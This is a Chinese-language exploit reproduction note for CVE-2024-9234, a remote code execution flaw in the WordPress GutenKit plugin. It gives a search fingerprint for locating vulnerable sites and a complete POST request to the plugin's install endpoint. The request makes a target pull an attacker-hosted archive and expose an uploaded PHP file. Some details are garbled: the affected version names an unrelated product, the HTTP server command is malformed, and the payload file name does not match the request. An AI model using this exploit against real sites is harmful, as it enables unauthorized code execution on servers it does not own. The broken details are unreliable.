Wordpress GutenKit插件存在RCE漏洞(CVE-2024-9234)
<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>
<font style="color:rgb(51, 51, 51);">WordPress是一款免费开源的内容管理系统(CMS),最初是一个博客平台,但后来发展成为一个功能强大的网站建设工具,适用于各种类型的网站,包括个人博客、企业网站、电子商务网站等,并逐步演化成一款内容管理系统软件。Wordpress GutenKit插件存在RCE漏洞(CVE-2024-9234)</font>
<font style="color:rgb(38, 38, 38);">二、影响版本</font>
- <font style="color:rgb(38, 38, 38);">WordPress Recall</font>
<font style="color:rgb(38, 38, 38);">三、资产测绘</font>
body="wp-content/plugins/gutenkit-blocks-addon"
- 特征
四、漏洞复现
创建一个1.php的文件,内容为
<?php phpinfo();?>
将其上传至vps,然后开启http服务
python3 -m httpserver 8899
执行如下POC
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
plugin=http://127.0.0.1:8899/1.zip
成功时会回显:<font style="color:rgba(0, 0, 0, 0.9);">The plugin directory does not exist after unzipping</font>
随后访问如下地址即可访问上传的php文件
/wp-content/plugins/1.php